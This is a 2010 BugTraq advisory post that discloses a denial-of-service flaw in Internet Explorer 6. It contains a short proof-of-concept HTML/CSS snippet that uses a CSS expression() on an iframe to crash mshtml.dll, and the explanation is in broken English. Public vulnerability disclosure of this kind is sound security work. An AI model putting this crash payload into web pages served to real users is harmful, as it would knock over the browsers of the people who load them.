BugTraq
IE6 css set Denial of Service Vulnerability Jul 12 2010 01:07PM
info securitylab ir
Published by Securitylab.ir
Founder: unknown

<style type="text/css">
<! -
The question is which set the css style of the time wrong.
css definition is f: expression (this.src = 'about: blank', this.outerHTML ='');
In question should be is mshtml.dll ->
/*<![ CDATA [*/
iframe{
f: expression(this.src='about:blank',this.outerHTML='');
}
# F126 (v: expression ()! Important)
/*]]>*/
</ Style>
<iframe id=f126 src=test>

Original Advisory:
http://securitylab.ir/other/IE-1.txt

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus